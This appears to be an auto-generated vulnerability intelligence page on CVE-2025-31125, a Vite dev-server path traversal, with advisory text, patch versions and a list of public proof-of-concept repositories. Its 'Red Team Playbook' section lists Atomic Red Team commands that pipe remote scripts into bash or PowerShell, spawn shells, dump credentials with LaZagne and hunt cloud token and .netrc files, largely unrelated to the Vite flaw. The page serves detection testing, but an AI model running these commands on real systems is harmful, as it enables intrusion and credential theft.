CVE-2025-31125
Overview
This vulnerability is a path traversal flaw in the Vite development server's @fs endpoint, allowing unauthorized file access. The root cause lies in improper validation of file path parameters, enabling traversal outside the intended directory. The affected component is the Vite dev server when exposed to the network via the --host or server.host configuration options.
Vulnerability Description
Vite is a frontend tooling framework for javascript. Vite exposes content of non-allowed files using ?inline&import or ?raw?import. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected. This vulnerability is fixed in 6.2.4, 6.1.3, 6.0.13, 5.4.16, and 4.5.11.
Impact
An attacker with network access to the exposed Vite development server can read sensitive system or application files by exploiting the path traversal vulnerability. No authentication or user interaction is needed, only that the dev server is publicly reachable. This can lead to information disclosure, potentially exposing credentials, configuration files, or other sensitive data, which may facilitate further attacks or compromise of the affected environment.
Solution
Upgrade Vite to one of the patched versions: 6.2.4, 6.1.3, 6.0.13, 5.4.16, or 4.5.11, as detailed in the official GitHub security advisory (https://github.com/vitejs/vite/security/advisories/GHSA-4r4m-qw57-chr8). These releases address the path traversal issue in the @fs endpoint. Avoid exposing the Vite development server to external networks unless necessary and ensure proper configuration of the --host or server.host options.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Vite frontend tooling framework arises from its handling of file exposure through specific query parameters, namely `?inline&import` and `?raw?import`. This flaw allows unauthorized access to the contents of files that should not be publicly accessible. The issue primarily affects applications that have explicitly configured the Vite development server to be accessible over the network, typically by using the `--host` option or the `server.host` configuration setting. This misconfiguration can lead to sensitive information leakage, as attackers can exploit the framework's functionality to retrieve files that contain critical data, such as configuration files, environment variables, or even source code.
Attack vectors for this vulnerability are straightforward yet effective. An attacker could leverage a simple HTTP request to the Vite server, appending the vulnerable query parameters to access non-allowed files. This could be done remotely if the server is exposed to the internet, or locally if the attacker has access to the same network. For instance, an attacker could craft a request targeting a known file path, potentially gaining access to sensitive application logic or private keys stored within the application. The simplicity of this exploitation method makes it particularly concerning, as it requires minimal technical expertise and can be executed quickly.
The real-world impact of this vulnerability can be significant, particularly for organizations that rely on Vite for their frontend development. If an attacker successfully exploits this flaw, they could gain access to proprietary code, sensitive configuration files, or other critical data, leading to potential data breaches. The business risks associated with such incidents include financial losses, reputational damage, and legal repercussions, especially if the exposed data includes personally identifiable information (PII) or other regulated data. Furthermore, the implications of a successful attack could extend beyond the immediate organization, affecting customers, partners, and stakeholders who trust the organization to protect their data.
To detect and mitigate this vulnerability, organizations should first ensure that they are running a patched version of the Vite framework, as updates have been released to address this issue. Regularly auditing server configurations is essential to ensure that the development server is not exposed to the network unless absolutely necessary. Implementing strict access controls and network segmentation can help limit exposure to potential attackers. Additionally, organizations should consider employing web application firewalls (WAFs) to monitor and filter incoming traffic, potentially blocking malicious requests that attempt to exploit this vulnerability. Regular security assessments and penetration testing can also help identify misconfigurations and vulnerabilities before they can be exploited.
In conclusion, the vulnerability within the Vite framework highlights the importance of secure configuration practices in software development environments. By understanding the technical details, potential attack vectors, and real-world impacts, organizations can better prepare themselves to defend against such threats. Proactive detection and mitigation strategies are crucial in safeguarding sensitive information and maintaining the integrity of web applications built with Vite.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vitejs | Vite | All |
cpe:2.3:a:vitejs:vite:*:*:*:*:*:node.js:*:*
|
|
|
Vitejs | Vite | All |
cpe:2.3:a:vitejs:vite:*:*:*:*:*:node.js:*:*
|
|
|
Vitejs | Vite | All |
cpe:2.3:a:vitejs:vite:*:*:*:*:*:node.js:*:*
|
|
|
Vitejs | Vite | All |
cpe:2.3:a:vitejs:vite:*:*:*:*:*:node.js:*:*
|
|
|
Vitejs | Vite | All |
cpe:2.3:a:vitejs:vite:*:*:*:*:*:node.js:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (4)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
sunhuiHi666/CVE-2025-31125
Vite 任意文件读取漏洞POC
|
sunhuiHi666 | 6 | 0 | 2025-04-01 | View |
|
MuhammadWaseem29/Vitejs-exploit
Vite Development Server's @fs endpoint (CVE-2025-31125) to access sensitive files like /etc/passwd and /etc/hosts via c...
|
MuhammadWaseem29 | 0 | 2 | 2025-05-03 | View |
|
0xgh057r3c0n/CVE-2025-31125
Vite WASM Import Path Traversal 🛡️
|
0xgh057r3c0n | 0 | 0 | 2025-05-07 | View |
|
harshgupptaa/Path-Transversal-CVE-2025-31125-
Vite is a frontend tooling framework for javascript. Vite exposes content of non-allowed files using ?inline&import or ?...
|
harshgupptaa | 0 | 0 | 2025-07-13 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-31125 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/vitejs/vite/security/advisories/GHSA-4r4m-qw57-chr8 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/vitejs/vite/commit/59673137c45ac2bcfad1170d954347c1a17ab949 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-31125 |